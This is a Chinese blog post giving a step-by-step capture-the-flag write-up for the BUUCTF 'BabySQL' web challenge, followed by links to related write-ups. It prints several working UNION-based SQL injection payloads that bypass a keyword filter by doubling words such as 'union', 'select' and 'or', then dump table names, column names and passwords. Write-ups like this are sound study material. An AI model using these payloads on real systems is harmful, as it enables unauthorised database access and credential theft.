BUUCTF [极客大挑战 2019]BabySQL

于 2024-04-16 16:15:28 发布
阅读量334 收藏 4
点赞数 6
分类专栏: CTF web题目 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_73399382/article/details/137826239
版权
文章讲述了作者在测试过程中逐步识别和利用SQL注入漏洞的过程,包括发现注入点、绕过过滤机制、构造payload以及暴露出表名和列名的详细步骤。
摘要由CSDN通过智能技术生成

边做题边写这个可能有点不流利

打开看到页面说他进行了过滤,我们待会看看

看源码就一张表单其他啥也没有

先找注入点

加单引号报错说明还存在注入点

试试万能密码

使用万能密码都报错,说明and or 可能都被过滤掉了

接下来试试双写绕过(用一个关键字分割开另一个关键字,过滤掉第一个后自动拼接到一起,例:an(and)d,括号不用加)

使用payload:1' oorr 1=1#登录成功,并且看到url里面传入参数

使用payload:1' group by 1%23报错,说明还要双写

双写by后不再报错,说明by被过滤需双写。payload:1' group bbyy 1%23

从1试到4后报这个错说明查询列数为3

接下来找回显点

使用payload:1' union select database(),version(),1%23报错,可能是union或者select中一个或者都是

经过尝试发现在union和select都双写后成功注入

 构造payload:

发现一号位不是回显点,二三号位都是回显点

接下来暴表

使用payload:1' union selselectect 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()%23发现有报错,看了一下还能过滤的多半是where

重新构造payload又双写where,from后又报错

德我仔细一看information里面的or不见了,好家伙,这里的or也过滤了

重新构造好payload:

1' ununionion selselectect 1,2,group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema=database()%23

成功爆出两张表名:b4bsql,geekuser

接下来爆列名

第一个payload:

1' ununionion seselectlect 1,2,group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_name='b4bsql' anandd table_schema=database()%23

第二个payload:

1' ununionion seselectlect 1,2,group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_name='geekuser' anandd table_schema=database()%23

发现两张表b4bsql,geekuser的字段名都是id,username,password

接下来就直接拿数据喽!

先构建好payload(password还要双写or)

b4bsql表:

在b4bsql表password字段看到flag,另一张表就不查了

孤丞OVO
关注
  • 6
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[PwnThyBytes 2019]Baby_SQL - 代码审计+布尔盲注+SESSION_UPLOAD_PROGRESS利用
oZuoShen123的博客
10-10 230
简单的分析一下: 1、index.php中,开启了session,我们通过任何方式的传参都会经过过滤函数   过滤函数:参数值必须是字符串,其次是通过addslashes函数过滤 2、login.php,存在sql语句,并写了数据库是ptbctf,密码通过MD5的形式校验 3、register.php,用户名不允许是admin,且长度要6
阿里云IoT极客创新挑战赛.pdf
08-29
高级设计专家 望海 在2018云栖大会·上海峰会中做了题为《阿里云 IoT 极客创新挑战赛》的分享,就极客挑战赛创意来源、赛事的技术平台、赛事进程等方面的内容做了深入的分析。
BUU实战笔记——[GXYCTF2019]BabySQli1
qq_51175992的博客
09-16 267
这题是很简单的SQL注入,考察的是基本功和对联合查询的理解这里有两点需要特别注意:1. 不管是CTF题目还是实际的挖洞一定要先把它的流程走一遍看它是怎么玩的,再考虑怎么攻击,前期的信息收集十分重要!2.数据库的密码一般是通过MD5加密处理的,在注入的时候需要特别注意。
BUUCTF--[PwnThyBytes 2019]Baby_SQL
qq_46263951的博客
08-16 933
进入页面 查看网页源代码可以发现是source.zip泄露 接下来分析源码 查看index.php中的代码,发现这里对所有的参数都用filter函数进行了过滤 //index.php <?php session_start(); foreach ($_SESSION as $key => $value): $_SESSION[$key] = filter($value); endforeach; foreach ($_GET as $key => $value): $_GET.
[PwnThyBytes 2019]Baby_SQL
SopRomeo的博客
10-16 1922
根据题目名字,测试sql注入 抓包看到源代码,猜测文件包含,测试无果 登录和注册都没有注入点 题目提示也有 既然没思路,就扫目录 buu有请求次数限制,自己写个目录扫描 发现是source.zip泄露 代码审计 index页面有个函数会进行转义 他这里转义了所有传过去的参数 看到register和login都没有啥过滤,register必须要为admin注册 可以发现登录是存在注入点的 而index那个绕过是需要GBK编码才能绕的,之前还想着看看能不能二次注入,也不行 回过头来看到这段代码 re
2019年三诺集团四周年庆典极客摇滚跑活动方案.pptx
05-06
此文档描述的是2019年三诺集团四周年庆典的一项独特活动——“极客摇滚跑”。这是一场集科技、运动和音乐于一体的大型庆典,旨在庆祝三诺集团的周年纪念,并促进北海市高新产业园及其相关企业的交流与合作。活动的...
ISCC2019个人挑战赛题目练习
05-05
【ISCC2019个人挑战赛题目练习】是一次针对网络安全技术的竞赛,旨在提升参赛者在信息安全领域的技能和实战经验。此类挑战通常涵盖多种技术领域,包括但不限于密码学、漏洞分析、网络嗅探、逆向工程、Web安全以及...
天池Apache Flink极客挑战赛-垃圾图片分类算法源码+项目说明.zip
01-28
【资源说明】 1、该资源包括项目的全部源码,下载可以直接使用! 2、本项目适合作为计算机、数学、电子信息等专业的课程设计、期末大作业和毕设项目,...天池Apache Flink极客挑战赛-垃圾图片分类算法源码+项目说明.zip
极客学院JAVA视频教程 新版 7大部分
08-08
Java语言视频教程 极客学院JAVA视频教程 新版 7大部分
[PwnThyBytes 2019] Baby_SQL
GKD2019的博客
01-24 554
[PwnThyBytes 2019] Baby_SQL 当PHP检测到这种POST请求时,此时用户可以自己定义Session ID。
buuctf-[极客挑战 2019]BabySQL(小宇特详解)
小宇的web博客
01-19 5114
buuctf-[极客挑战 2019]BabySQL(小宇特详解) 这里看题的话是一道SQL注入。 这里先尝试一下万能密码 这里发现它过滤了or(直接删除了or) 这里尝试进行双写 也就是oorr,这里删除了or后又重新构造了一个or 这里发现还是不行 这里先看一下双写union select 1 /check.php?username=admin&password=1 %27 ununionion seselectlect 1 %23 这里发现不是报错,而是列数不对 当列数为3的时候对
BUUCTF--[GXYCTF2019]BabySQli详解
x1520700的博客
05-23 2709
题目预备知识 mysql在查询不存在的数据时会自动构建虚拟数据,一般数据要么明文,要么MD5,源码上用的是md5加密了密码 当没有回显字段时,只能猜测三个字段类型分别为id,username,password 1、经过题目名提示,猜测应该是SQL注入,进入题目,发现一个登录框功能板,确信应该就是SQL注入,开始注入; 这里分享一个小知识点: sql注入可能出现的功能点 登录页面,留言板,修改信息,获取http请求头(User-agent,referer,xff)等只要是和数据库存在交...
buuctf[极客挑战 2019]BabySQL--联合注入、双写过滤
weixin_61060664的博客
01-10 1532
有回显: The used SELECT statements have a different number of columns。有回显:版本为:“ 10.3.18-MariaDB!1' or'1'='1 失败。有回显,字段名为flag。
BUUCTF---[极客挑战 2019]BabySQL1
最新发布
2201_75556700的博客
03-03 726
1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()#使用该语句查表名时发现union,select,from,where都被过滤了。8.这里没有得到flag可能是我遗漏了什么,查了资料才发现,flag可能不在我们当前这个数据库里面,想到一开始,我还没查询库名,不知道它有几个苦命,于是使用下面命令进行数据库库名查询。使用下面命令爆第一张表的字段。
BUUCTF [GXYCTF2019]BabySQli 1 详解!(MD5与SQL之间的碰撞)
m0_73734159的博客
11-30 1822
通过用户所在列测试,得出了存在用户admin,又得出了admin用户在第二列,也就是username字段那一列。猜测’or’关键字或’='字符被过滤。发现参数password被md5加密。大致就是传进去的值要进行md5值加密。但是要对传入的那个值进行md5值加密。网上可以随便找一个在线md5加密平台。可以得出此题的注入点是参数name。可以得出此题的注入类型为字符型注入。通过测试发现是套加密(二次加密)通过对这段SQL语句的初步判断。看着和之前做过的题很类似。在注释那里发现某种编码。repeater放包。
BUUCTFBabySQL[极客挑战 2019]
金 帛的博客
06-11 453
BUUCTF记录贴
BUUCTF [极客挑战 2019] BabySQL
Senimo
03-25 3871
BUUCTF [极客挑战 2019] BabySQL 启动靶机,打开环境: 尝试登陆: 因为前两次的题目BUUCTF 极客挑战 2019 EasySQL和均用万能密码登陆成功,再次尝试: /check.php ?username=admin' or '1'='1 &password=1 登陆失败,尝试注释掉password内容: /check.php ?username=adm...
buuctf 极客挑战2019php
08-24
buuctf 极客挑战2019php是指buuctf举办的一个PHP编程比赛,它是基于阿里云IoT技术平台的创新挑战赛。在该比赛中,参赛者需要利用PHP编写代码解决一系列技术难题。这些问题可能涉及到序列化、反序列化、变量值的展示等。序列化是指将对象转化为字符串的过程,而反序列化则是将字符串转化为对象的过程。在PHP中,可以使用serialize()函数进行序列化,并使用var_dump()函数进行反序列化结果的展示。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [阿里云IoT极客创新挑战赛.pdf](https://download.csdn.net/download/weixin_38744375/11634853)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* *3* [【BUUCTF-Web】 [极客挑战 2019]PHP](https://blog.csdn.net/m0_51683653/article/details/126693573)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值